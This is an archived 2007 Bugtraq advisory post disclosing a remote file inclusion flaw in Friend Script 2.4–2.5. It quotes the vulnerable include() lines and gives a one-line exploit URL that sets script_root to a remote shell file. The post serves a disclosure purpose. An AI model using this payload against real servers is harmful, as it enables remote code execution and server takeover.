lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20070727234804.3958.qmail@securityfocus.com>
Date: 27 Jul 2007 23:48:04 -0000
From: yollubunlar@...lubunlar.org
To: bugtraq@...urityfocus.com
Subject: Friend Script 2.5 - 2.4 Remote File &#304;nclude

###############################################################################

Olmek Var$a Kaderde Dert Ekleme Derdine Team :)

###############################################################################


Portal:Friend Script 2.5 - 2.4 Remote File &#304;nclude Vulnerable
Author:Yollubunlar
http://yollubunlar.Org

###############################################################################


Bug &#304;n tell_a_friend.inc.php

          include($script_root . 'inc/functions.inc.php');
          include($script_root . 'inc/template.class.inc.php');
          include($script_root . 'inc/formmail.class.inc.php');

###############################################################################

Exploit:script_path/inc/tell_a_friend.inc.php?script_root=Sh3ll.txt?

###############################################################################

Greetz : EveryBody

###############################################################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ